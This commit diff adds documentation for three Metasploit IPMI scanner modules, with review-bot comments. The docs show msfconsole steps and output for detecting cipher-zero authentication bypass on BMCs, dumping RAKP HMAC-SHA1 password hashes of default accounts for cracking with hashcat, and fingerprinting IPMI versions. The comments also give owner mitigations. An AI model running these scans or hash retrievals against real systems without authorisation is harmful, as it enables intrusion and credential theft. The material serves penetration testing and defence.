add module documentation
parent 46c7e822c8
commit 6f70efcfa1
@ -0,0 +1,20 @@
The ipmi_cipher_zero module is used to find IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of IPMI cipher zero, which means no cipher is used at all.
## Vulnerable Devices
This is an error in the IPMI 2.0 specification itself, so any device BMC fully implementing IPMI 2.0 will possibly have the vulnerable non-cipher enabled.
## Verification Steps
Set RHOSTS to the target device or range and run:
```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.2
RHOSTS => 192.168.1.2
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
[*] 192.168.1.2:623 - IPMI - NOT VULNERABLE: Rejected cipher zero with error code 17
```
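Review bot: the sample run only shows the negative case ("NOT VULNERABLE: Rejected cipher zero with error code 17"); add the line a vulnerable BMC produces so readers can recognise a positive result, and say what that result means for the owner: with cipher suite zero the session is established without any authentication ("no cipher is used at all" in the intro), so the fix is to disable cipher suite 0 on the BMC and keep the IPMI port (623, shown in the output) off untrusted networks. "The vulnerable non-cipher" under Vulnerable Devices is also awkward; "cipher suite zero" matches the wording of the description.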
@ -0,0 +1,34 @@
The ipmi_dumphashes module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
## Vulnerable Devices
Any IPMI 2.0 device implementing the RAKP protocol according to the IPMI specification is vulnerable. This is a design flaw rather than a vendor-specific vulnerability.
## Verification Steps
Set RHOSTS to the target device or range and run:
```
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 192.168.1.2
RHOSTS => 192.168.1.2
msf auxiliary(ipmi_dumphashes) > run
[*] 192.168.1.2:623 - IPMI - Sending IPMI probes
[*] 192.168.1.2:623 - IPMI - Trying username 'ADMIN'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'admin'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username admin: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'root'...
[+] 192.168.1.2:623 - IPMI - Hash found: root:redacted
[*] 192.168.1.2:623 - IPMI - Trying username 'Administrator'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username Administrator: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'USERID'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'guest'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username guest: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username ''...
[+] 192.168.1.2:623 - IPMI - Hash found: redacted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
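Review bot: the intro says the hashes can be saved with OUTPUT_FILE and then cracked with hmac_sha1_crack.rb or hashcat type 7300, but the Verification Steps never set OUTPUT_FILE, so a reader who follows them has nothing to hand to either tool; add a `set OUTPUT_FILE <path>` line to the example. "as well hashcat" should read "as well as hashcat". It would also help to state why the two "Hash found" lines (root and the empty username) are the finding: the RAKP exchange returns the HMAC-SHA1 keyed with the account password to any client that names a valid user, so the owner's mitigation is a strong, unique password per account and removal of unused defaults such as the anonymous user seen here.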
@ -0,0 +1,21 @@
The ipmi_version module is used to identify the version of the IPMI specification implemented by devices on a network.
## Target Devices
Any exposed device that implements the IPMI specification should work with this module. This is a recon module rather than an exploitation module.
## Verification Steps
Set RHOSTS to the target device or range and run:
```
msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 192.168.1.2
RHOSTS => 192.168.1.2
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
[*] 192.168.1.2:623 - IPMI - Probe sent
[+] 192.168.1.2:623 - IPMI - IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
```
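Review bot: the fingerprint line `IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)` is the whole output of the module, yet none of its fields is explained; add a short legend (Level lists the IPMI versions the BMC reports, PassAuth the authentication types it advertises, OEMID the vendor identifier it returns) so a reader can tell from this output whether the ipmi_cipher_zero or ipmi_dumphashes checks are worth running against a 2.0-capable device. The heading "Target Devices" also differs from "Vulnerable Devices" in the other two docs; reasonable for a recon module, but worth a sentence saying so.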
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
super(
super(
'Name' => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
'Name' => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
'Description' => %q|
'Description' => %q|
This module identifies IPMI 2.0 compatible systems that are vulnerable
This module identifies IPMI 2.0-compatible systems that are vulnerable
to an authentication bypass vulnerability through the use of cipher
to an authentication bypass vulnerability through the use of cipher
zero.
zero.
|,
|,
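Review bot: the only change in this hunk is the hyphen in "IPMI 2.0-compatible" on the first description line. Harmless, but it is an edit to the module's own description under a commit titled "add module documentation", so either mention it in the commit message or split it out; if it stays, keep it in sync with the new ipmi_cipher_zero doc, which uses the same hyphenated phrase.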
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
super(
super(
'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
'Description' => %q|
'Description' => %q|
This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
This module identifies IPMI 2.0-compatible systems and attempts to retrieve the
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
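Review bot: since this hunk already edits the description, fix the grammar on its last line as well: "as well hashcat (cpu) 0.46 or newer using type 7300" should read "as well as hashcat (CPU) 0.46 or newer using hash type 7300". The same sentence is copied verbatim into the new ipmi_dumphashes doc, so both places need the change or the doc and module description drift apart immediately.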